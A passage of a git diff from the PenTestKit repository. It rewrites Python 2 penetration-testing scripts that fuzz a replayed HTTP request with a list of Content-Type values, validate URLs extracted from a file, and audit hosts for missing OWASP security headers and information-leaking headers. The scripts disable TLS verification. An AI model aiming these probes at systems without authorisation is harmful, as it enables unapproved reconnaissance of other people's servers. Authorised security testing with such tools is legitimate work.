set().union(input1_params.keys()) + + input2_params = urlparse.parse_qs(args.input2, True) + input2_params = set().union(input2_params.keys()) + + unique_params = input1_params.union(input2_params) + + params1_not_params2 = list(input1_params - input2_params) + params2_not_params1 = list(input2_params - input1_params) + + print + print "[+] Unique parameters" + print + print ', '.join(unique_params) + + print + print + print "[+] Parameters in input1 and not in input2" + print + print ', '.join(params1_not_params2) + + print + print "[+] Parameters in input2 and not in input1" + print + print ', '.join(params2_not_params1) diff --git a/web/content-type-checker.py b/web/content-type-checker.py index 41bad42..64085b6 100644 --- a/web/content-type-checker.py +++ b/web/content-type-checker.py @@ -1,207 +1,207 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel", "nma-io"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - - -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) -import sys -import os -import argparse -from argparse import RawTextHelpFormatter -from termcolor import colored - - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def load_request(filename): - post_data = '' - headers = {} - method = '' - uri = '' - - with open(filename) as f: - index = 0 - potential_data = False - - for line in f: - if index == 0: - first_line = line - if ' ' not in first_line: - raise Exception('[-] Invalid request file!') - - first_line = first_line.split(' ') - method = first_line[0].lower() #GET POST etc - uri = first_line[1] - index = 1 - continue - - if potential_data: - post_data = line - break - - if ':' in line: - words = line.split(':', 1) - headers[words[0].strip()] = words[1].strip() - - if line.strip() == '': - potential_data = True - - url = '{}://{}{}'.format('https', headers['Host'], uri) - - return url, headers, post_data, method - - -def load_contentTypes(filename, ack = True): - u = [] - - if ack: - print '[+] Loading content types from file {}...'.format(filename) - - with open(filename) as f: - for line in f: - if line.startswith('#'): - continue - if '/' in line: - u.append(line.strip()) - - return u - - -def main(): - parser = argparse.ArgumentParser(description='{}'.format(red('Test Content Types')), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-t", "--content-types", - action="store", - metavar='FILE', - dest='contentTypesFile', - type=str, - default=None, - required=True, - help='File containing contant types.') - - parser.add_argument("-r", "--request", - action="store", - metavar='FILE', - dest='requestFile', - type=str, - default=None, - required=True, - help='File containing http request (burp format).') - - parser.add_argument("-o", "--output", - action="store", - metavar='FILE', - dest='outputFile', - type=str, - default=None, - required=True, - help='File to write results.') - - parser.add_argument('-x', '--proxy', - action="store", - metavar='PROXY', - dest='proxy', - type=str, - default=None, - required=True, - help='Use proxy (eg. http://127.0.0.1:8080).') - - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - if (not os.path.isfile(args.requestFile)): - print red('[-] Please provide an existing request file.') - sys.exit() - - if (not os.path.isfile(args.contentTypesFile)): - print red('[-] Please provide an existing content types file.') - sys.exit() - - - contentTypes = load_contentTypes(args.contentTypesFile, False) - length = len(contentTypes) - if length ==0: - print red('[-] Content Types file is empty\n') - - i=1 - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - with open(args.outputFile, 'a') as ptfile: - for ct in contentTypes: - - print '[+] {}/{}({}%)\n'.format(i, length, (i*100)/length) #progress - print '[+] Checking content type {}'.format(cyan(ct)) - - requestName = os.path.splitext(os.path.basename(args.requestFile))[0] - print '[+] Request: {}'.format(cyan(requestName)) - - url, headers, post_data, method = load_request(args.requestFile) - headers['Content-Type']=ct - - try: - r = getattr(requests, method)(url, proxies=proxies, verify=False,headers=headers, data=post_data) - except: - print red('[-] Unexpected error') - continue - - ptfile.write('{}:{}:{} {}\n'.format(ct, requestName, r.status_code, requests.status_codes._codes[r.status_code][0].upper())) - print yellow('[+] {} {}').format(r.status_code, requests.status_codes._codes[r.status_code][0].upper()) - print '' - - i += 1 - - -if __name__ == '__main__': - main() - - +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel", "nma-io"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + + +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) +import sys +import os +import argparse +from argparse import RawTextHelpFormatter +from termcolor import colored + + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def load_request(filename): + post_data = '' + headers = {} + method = '' + uri = '' + + with open(filename) as f: + index = 0 + potential_data = False + + for line in f: + if index == 0: + first_line = line + if ' ' not in first_line: + raise Exception('[-] Invalid request file!') + + first_line = first_line.split(' ') + method = first_line[0].lower() #GET POST etc + uri = first_line[1] + index = 1 + continue + + if potential_data: + post_data = line + break + + if ':' in line: + words = line.split(':', 1) + headers[words[0].strip()] = words[1].strip() + + if line.strip() == '': + potential_data = True + + url = '{}://{}{}'.format('https', headers['Host'], uri) + + return url, headers, post_data, method + + +def load_contentTypes(filename, ack = True): + u = [] + + if ack: + print '[+] Loading content types from file {}...'.format(filename) + + with open(filename) as f: + for line in f: + if line.startswith('#'): + continue + if '/' in line: + u.append(line.strip()) + + return u + + +def main(): + parser = argparse.ArgumentParser(description='{}'.format(red('Test Content Types')), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-t", "--content-types", + action="store", + metavar='FILE', + dest='contentTypesFile', + type=str, + default=None, + required=True, + help='File containing contant types.') + + parser.add_argument("-r", "--request", + action="store", + metavar='FILE', + dest='requestFile', + type=str, + default=None, + required=True, + help='File containing http request (burp format).') + + parser.add_argument("-o", "--output", + action="store", + metavar='FILE', + dest='outputFile', + type=str, + default=None, + required=True, + help='File to write results.') + + parser.add_argument('-x', '--proxy', + action="store", + metavar='PROXY', + dest='proxy', + type=str, + default=None, + required=True, + help='Use proxy (eg. http://127.0.0.1:8080).') + + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + if (not os.path.isfile(args.requestFile)): + print red('[-] Please provide an existing request file.') + sys.exit() + + if (not os.path.isfile(args.contentTypesFile)): + print red('[-] Please provide an existing content types file.') + sys.exit() + + + contentTypes = load_contentTypes(args.contentTypesFile, False) + length = len(contentTypes) + if length ==0: + print red('[-] Content Types file is empty\n') + + i=1 + + proxies = { + 'http': args.proxy, + 'https': args.proxy, + } + + with open(args.outputFile, 'a') as ptfile: + for ct in contentTypes: + + print '[+] {}/{}({}%)\n'.format(i, length, (i*100)/length) #progress + print '[+] Checking content type {}'.format(cyan(ct)) + + requestName = os.path.splitext(os.path.basename(args.requestFile))[0] + print '[+] Request: {}'.format(cyan(requestName)) + + url, headers, post_data, method = load_request(args.requestFile) + headers['Content-Type']=ct + + try: + r = getattr(requests, method)(url, proxies=proxies, verify=False,headers=headers, data=post_data) + except: + print red('[-] Unexpected error') + continue + + ptfile.write('{}:{}:{} {}\n'.format(ct, requestName, r.status_code, requests.status_codes._codes[r.status_code][0].upper())) + print yellow('[+] {} {}').format(r.status_code, requests.status_codes._codes[r.status_code][0].upper()) + print '' + + i += 1 + + +if __name__ == '__main__': + main() + + diff --git a/web/extract-urls.py b/web/extract-urls.py index 54668ce..8416180 100644 --- a/web/extract-urls.py +++ b/web/extract-urls.py @@ -1,136 +1,136 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -################################################## - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017 @maldevel" -__credits__ = ["maldevel"] -__license__ = "GPLv3" -__version__ = "0.1" -__maintainer__ = "maldevel" - -################################################## - -from datetime import datetime -import signal -from urllib2 import urlopen -import re -import os -import sys -import argparse -from argparse import RawTextHelpFormatter -from termcolor import colored - -################################################## - -def yellow(text): - return colored(text, 'yellow', attrs=['bold']) - -def green(text): - return colored(text, 'green', attrs=['bold']) - -def red(text): - return colored(text, 'red', attrs=['bold']) - -def cyan(text): - return colored(text, 'cyan', attrs=['bold']) - -def signal_handler(signal, frame): - sys.exit(0) - -################################################## - -def main(): - parser = argparse.ArgumentParser(description='{}'.format(cyan('Extract URLs')), formatter_class=RawTextHelpFormatter) - - parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') - parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='log.txt', required=False, help='File to write results.') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit() - - args = parser.parse_args() - - print '\n[*] Extract URLs from file.' - - if (not os.path.isfile(args.filename)): - print red('[-] Please provide an existing file.\n') - sys.exit() - - with open(args.outputFile, 'a') as logfile: - - logfile.write('\n---\n\n') - - print '[*] Reading file {}..'.format(args.filename) - logfile.write('{}: Reading file {}\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), args.filename)) - - filename = open(args.filename) - content = filename.read() - - print '[*] Extracting URLs..' - logfile.write('{}: Extracting URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) - - urls = re.findall(r'(?Phttps?://[^\s]+)', content)#(https?://\S+) - urls = [u.replace(')', '') for u in urls] #markdown urls contain ) at the end of url - - print green('[*] Found {} URLs.'.format(len(urls))) - logfile.write('{}: Found {} URLs.\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), len(urls))) - - print '[*] Validating URLs..' - logfile.write('{}: Validating URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) - - invalidUrls = 0 - validUrls = 0 - - for u in urls: - dt = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S') - code = urlopen(u).code - if (code / 100 >= 4): - print red('[-] Invalid URL ({}) {}'.format(code, u)) - logfile.write('{}: Invalid URL ({}) {}\n'.format(dt, code, u)) - invalidUrls += 1 - else: - print green('[+] Valid URL ({}) {}'.format(code, u)) - logfile.write('{}: Valid URL ({}) {}\n'.format(dt, code, u)) - validUrls += 1 - - print '\n' - print '[*] Valid URLs: {}'.format(validUrls) - logfile.write('Valid URLs: {}\n'.format(validUrls)) - print '[*] Invalid URLs: {}'.format(invalidUrls) - logfile.write('Invalid URLs: {}\n'.format(invalidUrls)) - - print '\n' - -################################################## - -if __name__ == '__main__': - signal.signal(signal.SIGINT, signal_handler) - main() - +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +################################################## + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017 @maldevel" +__credits__ = ["maldevel"] +__license__ = "GPLv3" +__version__ = "0.1" +__maintainer__ = "maldevel" + +################################################## + +from datetime import datetime +import signal +from urllib2 import urlopen +import re +import os +import sys +import argparse +from argparse import RawTextHelpFormatter +from termcolor import colored + +################################################## + +def yellow(text): + return colored(text, 'yellow', attrs=['bold']) + +def green(text): + return colored(text, 'green', attrs=['bold']) + +def red(text): + return colored(text, 'red', attrs=['bold']) + +def cyan(text): + return colored(text, 'cyan', attrs=['bold']) + +def signal_handler(signal, frame): + sys.exit(0) + +################################################## + +def main(): + parser = argparse.ArgumentParser(description='{}'.format(cyan('Extract URLs')), formatter_class=RawTextHelpFormatter) + + parser.add_argument("-f", "--filename", action="store", metavar='FILE', dest='filename', type=str, default=None, required=True, help='File containing urls.') + parser.add_argument("-o", "--output", action="store", metavar='FILE', dest='outputFile', type=str, default='log.txt', required=False, help='File to write results.') + + if len(sys.argv) is 1: + parser.print_help() + sys.exit() + + args = parser.parse_args() + + print '\n[*] Extract URLs from file.' + + if (not os.path.isfile(args.filename)): + print red('[-] Please provide an existing file.\n') + sys.exit() + + with open(args.outputFile, 'a') as logfile: + + logfile.write('\n---\n\n') + + print '[*] Reading file {}..'.format(args.filename) + logfile.write('{}: Reading file {}\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), args.filename)) + + filename = open(args.filename) + content = filename.read() + + print '[*] Extracting URLs..' + logfile.write('{}: Extracting URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) + + urls = re.findall(r'(?Phttps?://[^\s]+)', content)#(https?://\S+) + urls = [u.replace(')', '') for u in urls] #markdown urls contain ) at the end of url + + print green('[*] Found {} URLs.'.format(len(urls))) + logfile.write('{}: Found {} URLs.\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), len(urls))) + + print '[*] Validating URLs..' + logfile.write('{}: Validating URLs..\n'.format(datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'))) + + invalidUrls = 0 + validUrls = 0 + + for u in urls: + dt = datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S') + code = urlopen(u).code + if (code / 100 >= 4): + print red('[-] Invalid URL ({}) {}'.format(code, u)) + logfile.write('{}: Invalid URL ({}) {}\n'.format(dt, code, u)) + invalidUrls += 1 + else: + print green('[+] Valid URL ({}) {}'.format(code, u)) + logfile.write('{}: Valid URL ({}) {}\n'.format(dt, code, u)) + validUrls += 1 + + print '\n' + print '[*] Valid URLs: {}'.format(validUrls) + logfile.write('Valid URLs: {}\n'.format(validUrls)) + print '[*] Invalid URLs: {}'.format(invalidUrls) + logfile.write('Invalid URLs: {}\n'.format(invalidUrls)) + + print '\n' + +################################################## + +if __name__ == '__main__': + signal.signal(signal.SIGINT, signal_handler) + main() + diff --git a/web/headers-checker.py b/web/headers-checker.py index 69a96ca..ce47bfd 100644 --- a/web/headers-checker.py +++ b/web/headers-checker.py @@ -1,325 +1,325 @@ -#!/usr/bin/python -# encoding: UTF-8 - -""" - This file is part of PenTestKit - Copyright (C) 2017-1018 @maldevel - https://github.com/maldevel/PenTestKit - - PenTestKit - Useful tools for Penetration Testing. - - This program is free software: you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation, either version 3 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program. If not, see . - - For more see the file 'LICENSE' for copying permission. - -""" - -__author__ = "maldevel" -__copyright__ = "Copyright (c) 2017-2018 @maldevel" -__credits__ = ["maldevel", "nma-io"] -__license__ = "GPLv3" -__version__ = "0.8" -__maintainer__ = "maldevel" - -################################ - -import argparse -import sys -import os -import requests - -from urlparse import urlparse -from termcolor import colored -from argparse import RawTextHelpFormatter - -################################ - -from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning -requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning - -################################ - -def print_request(req): - output = '\n' - output += '{} {} HTTP/1.1\n'.format(req.method, req.url) - host = urlparse(req.url).hostname - output += 'Host: {}\n'.format(host) - output += '\n'.join(['%s: %s' % (key, value) for (key, value) in req.headers.items()]) - output += '\n' - return output - -################################ - -def print_response(resp, req): - output = '\n' - output += '\n'.join(['%s: %s' % (key, value) for (key, value) in resp.headers.items()]) - output += '\n\n[...]\n' - return output - -################################ - -def _analyzeHost(host, proxies): - try: - data = requests.get(host, verify=False, proxies=proxies, timeout=5, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'}) - req = print_request(data.request) - except requests.exceptions.ConnectionError as e: - print '[-] {}: Connection Error ({})'.format(host, e) - return None, None, None - except Exception as e: - print '[-] {}: No Data ({})'.format(host, e) - return None, None, None - - if not data: - print '[-] {}: No Data'.format(host) - return None, None, None - - if data.status_code not in range(200, 209): - print '[-] {}: Status code {}'.format(host, data.status_code) - return None, None, None - - print '[+] {}: {} {}'.format(host, data.status_code, requests.status_codes._codes[data.status_code][0].upper()) - - resp = print_response(data, data.request) - - headers = data.headers - - return headers, req, resp - -################################ - -def _checkHeaders(headers, https, text=False): - results = [] - - secureHeaders = { - 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', - 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', - 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', - 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', - 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies', - 'Referrer-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#rp', - 'Cache-control':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)', - 'Pragma':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)' - } - - if https: - secureHeaders.update({ - 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', - 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' - }) - - if text: - for h in list(secureHeaders): - if h not in headers: - results.append('{}'.format(h)) - else: - for h in list(secureHeaders): - if h not in headers: - results.append('{}: {}'.format(h, secureHeaders[h])) - return results - -################################ - -def _checkInfoLeak(headers): - results = [] - - InfoLeakHeaders = { - 'Server', - 'X-Forwarded-For', - 'X-AspNetMvc-Version', - 'X-NvRenderingEngine', - 'X-AspNet-Version', - 'X-Powered-By', - 'Via' - } - - for h in list(InfoLeakHeaders): - if h in headers: - results.append('{}: {}'.format(h, headers[h])) - - return results - -################################ - -def checkHosts(hosts, output, text, proxies, req, resp): - http_headers_vulns = '' - - for host in hosts: - if '://' not in host: - print '[-] {}: Invalid host'.format(host) - continue - - https = False - if 'https' in host: - https = True - - print '[+] {}: Checking headers'.format(host) - - results, reqtext, resptext = _analyzeHost(host, proxies) - - if req and reqtext: - print '[+] {}: Request'.format(host) - print reqtext - - if not results: - print '[-] {}: An error occured during host analysis\n'.format(host) - continue - - http_headers_vulns = _checkHeaders(results, https, text) - if not http_headers_vulns: - print '[-] {}: An error occured during secure headers analysis\n'.format(host) - continue - - http_infoleak_vulns = _checkInfoLeak(results) - if not http_infoleak_vulns: - print '[-] {}: An error occured during headers information leakage analysis\n'.format(host) - continue - - if text: - data = '\n{}\n'.format('\n'.join(http_headers_vulns)) - data2 = '\n{}\n'.format('\n'.join(http_infoleak_vulns)) - else: - data = '\t* {}'.format('\n\t* '.join(http_headers_vulns)) - data2 = '\t* {}'.format('\n\t* '.join(http_infoleak_vulns)) - - if resp and resptext: - print '[+] {}: Response'.format(host) - print resptext - - print '[+] {}: Missing OWASP Secure Headers:'.format(host) - print data - - print '[+] {}: Headers Leaking Information:'.format(host) - print data2 - - print '[+] {}: Finish'.format(host) - print '' - - if output: - with open('{}\{}.md'.format(output, host.replace('http://', '')), 'w') as f: - f.write('## Target {}\n\n'.format(host)) - f.write('### Missing OWASP secure headers\n') - f.write(data.replace('\n', '\n* ')[:-2]) - f.write('\n') - f.write('### Headers leaking information\n') - f.write(data2.replace('\n', '\n* ')[:-2]) - if reqtext: - f.write('\n### HTTP Request\n\n') - f.write('```') - f.write('{}'.format(reqtext)) - f.write('```\n') - if resptext: - f.write('\n### HTTP Response\n\n') - f.write('```') - f.write('{}'.format(resptext)) - f.write('```\n') - -################################ - -message = """ - _____ _ _ _ -/ ___| | | | | | | -\ `--. ___ ___ _ _ _ __ ___ | |_| | ___ __ _ __| | ___ _ __ ___ - `--. \/ _ \/ __| | | | '__/ _ \ | _ |/ _ \/ _` |/ _` |/ _ \ '__/ __| -/\__/ / __/ (__| |_| | | | __/ | | | | __/ (_| | (_| | __/ | \__ \\ -\____/ \___|\___|\__,_|_| \___| \_| |_/\___|\__,_|\__,_|\___|_| |__ / - - Headers Checker | @maldevel - Version: {} -""".format(__version__) - - -def MainFunc(): - parser = argparse.ArgumentParser(description=message, formatter_class=RawTextHelpFormatter) - - parser.add_argument("-H", "--host", - action="store", - metavar='hostname', - dest='host', - type=str, - default=None, - help='The host to check, e.g. http://example.com, https://example.com, http://192.168.1.1') - - parser.add_argument('-l', '--list', - action='store', - metavar='hostsfile', - dest='hostsfile', - type=str, - default=None, - help='Hosts list file path. Place each target host in new line.') - - parser.add_argument('-o', '--output', - action='store', - metavar='directory', - dest='output', - type=str, - default=None, - help='Output directory path') - - parser.add_argument('-x', '--proxy', - action="store", - metavar='PROXY', - dest='proxy', - type=str, - default=None, - required=False, - help='Use proxy (eg. http://127.0.0.1:8080).') - - parser.add_argument('-t', '--text', - action="store_true", - help='Print plain text results.') - - parser.add_argument('-r', '--request', - action="store_true", - help='Print request raw text.') - - parser.add_argument('-e', '--response', - action="store_true", - help='Print response raw text.') - - if len(sys.argv) is 1: - parser.print_help() - sys.exit(1) - - args = parser.parse_args() - - print message - - host = args.host - flist = args.hostsfile - - if host and flist: - print '[-] {}: Please specify one host only (-H) or a file list of hosts (-l).'.format(host) - sys.exit(1) - - proxies = { - 'http': args.proxy, - 'https': args.proxy, - } - - if host: - checkHosts([args.host], args.output, args.text, proxies, args.request, args.response) - elif flist: - hosts = [] - with open(flist, 'r') as f: - hosts = f.read().splitlines() - checkHosts(hosts, args.output, args.text, proxies, args.request, args.response) - - -if __name__ == '__main__': - try: - MainFunc() - except KeyboardInterrupt: - print "Interrupted by user.." - except: - sys.exit() +#!/usr/bin/python +# encoding: UTF-8 + +""" + This file is part of PenTestKit + Copyright (C) 2017-1018 @maldevel + https://github.com/maldevel/PenTestKit + + PenTestKit - Useful tools for Penetration Testing. + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + For more see the file 'LICENSE' for copying permission. + +""" + +__author__ = "maldevel" +__copyright__ = "Copyright (c) 2017-2018 @maldevel" +__credits__ = ["maldevel", "nma-io"] +__license__ = "GPLv3" +__version__ = "0.8" +__maintainer__ = "maldevel" + +################################ + +import argparse +import sys +import os +import requests + +from urlparse import urlparse +from termcolor import colored +from argparse import RawTextHelpFormatter + +################################ + +from requests.packages.urllib3.exceptions import InsecureRequestWarning #remove insecure https warning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) #remove insecure https warning + +################################ + +def print_request(req): + output = '\n' + output += '{} {} HTTP/1.1\n'.format(req.method, req.url) + host = urlparse(req.url).hostname + output += 'Host: {}\n'.format(host) + output += '\n'.join(['%s: %s' % (key, value) for (key, value) in req.headers.items()]) + output += '\n' + return output + +################################ + +def print_response(resp, req): + output = '\n' + output += '\n'.join(['%s: %s' % (key, value) for (key, value) in resp.headers.items()]) + output += '\n\n[...]\n' + return output + +################################ + +def _analyzeHost(host, proxies): + try: + data = requests.get(host, verify=False, proxies=proxies, timeout=5, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'}) + req = print_request(data.request) + except requests.exceptions.ConnectionError as e: + print '[-] {}: Connection Error ({})'.format(host, e) + return None, None, None + except Exception as e: + print '[-] {}: No Data ({})'.format(host, e) + return None, None, None + + if not data: + print '[-] {}: No Data'.format(host) + return None, None, None + + if data.status_code not in range(200, 209): + print '[-] {}: Status code {}'.format(host, data.status_code) + return None, None, None + + print '[+] {}: {} {}'.format(host, data.status_code, requests.status_codes._codes[data.status_code][0].upper()) + + resp = print_response(data, data.request) + + headers = data.headers + + return headers, req, resp + +################################ + +def _checkHeaders(headers, https, text=False): + results = [] + + secureHeaders = { + 'X-Frame-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Frame-Options', + 'X-XSS-Protection':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-XSS-Protection', + 'X-Content-Type-Options':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Content-Type-Options', + 'Content-Security-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Content-Security-Policy', + 'X-Permitted-Cross-Domain-Policies':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#X-Permitted-Cross-Domain-Policies', + 'Referrer-Policy':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#rp', + 'Cache-control':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)', + 'Pragma':'https://www.owasp.org/index.php/Testing_for_Browser_cache_weakness_(OTG-AUTHN-006)' + } + + if https: + secureHeaders.update({ + 'Strict-Transport-Security':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#HTTP_Strict_Transport_Security_.28HSTS.29', + 'Public-Key-Pins':'https://www.owasp.org/index.php/OWASP_Secure_Headers_Project#Public_Key_Pinning_Extension_for_HTTP_.28HPKP.29' + }) + + if text: + for h in list(secureHeaders): + if h not in headers: + results.append('{}'.format(h)) + else: + for h in list(secureHeaders): + if h not in headers: + results.append('{}: {}'.format(h, secureHeaders[h])) + return results + +################################ + +def _checkInfoLeak(headers): + results = [] + + InfoLeakHeaders = { + 'Server', + 'X-Forwarded-For', + 'X-AspNetMvc-Version', + 'X-NvRenderingEngine', + 'X-AspNet-Version', + 'X-Powered-By', + 'Via' + } + + for h in list(InfoLeakHeaders): + if h in headers: + results.append('{}: {}'.format(h, headers[h])) + + return results + +################################ + +def checkHosts(hosts, output, text, proxies, req, resp): + http_headers_vulns = '' + + for host in hosts: + if '://' not in host: + print '[-] {}: Invalid host'.format(host) + continue + + https = False + if 'https' in host: + https = True + + print '[+] {}: Checking headers'.format(host) + + results, reqtext, resptext = _analyzeHost(host, proxies) + + if req and reqtext: + print '[+] {}: Request'.format(host) + print reqtext + + if not results: + print '[-] {}: An error occured during host analysis\n'.format(host) + continue + + http_headers_vulns = _checkHeaders(results, https, text) + if not http_headers_vulns: + print '[-] {}: An error occured during secure headers analysis\n'.format(host) + continue + + http_infoleak_vulns = _checkInfoLeak(results) + if not http_infoleak_vulns: + print '[-] {}: An error occured during headers information leakage analysis\n'.format(host) + continue + + if text: + data = '\n{}\n'.format('\n'.join(http_headers_vulns)) + data2 = '\n{}\n'.format('\n'.join(http_infoleak_vulns)) + else: + data = '\t* {}'.format('\n\t* '.join(http_headers_vulns)) + data2 = '\t* {}'.format('\n\t* '.join(http_infoleak_vulns)) + + if resp and resptext: + print '[+] {}: Response'.format(host) + print resptext + + print '[+] {}: Missing OWASP Secure Headers:'.format(host) + print data + + print '[+] {}: Headers Leaking Information:'.format(host) + print data2 + + print '[+] {}: Finish'.format(host) + print '' + + if output: + with open('{}\{}.md'.format(output, host.replace('http://', '')), 'w') as f: + f.write('## Target {}\n\n'.format(host)) + f.write('### Missing OWASP secure headers\n') + f.write(data.replace('\n', '\n* ')[:-2]) + f.write('\n') + f.write('### Headers leaking information\n') + f.write(data2.replace('\n', '\n* ')[:-2]) + if reqtext: + f.write('\n### HTTP Request\n\n') + f.write('```') + f.write('{}'.format(reqtext)) + f.write('```\n') + if resptext: + f.write('\n### HTTP Response\n\n') + f.write('```') + 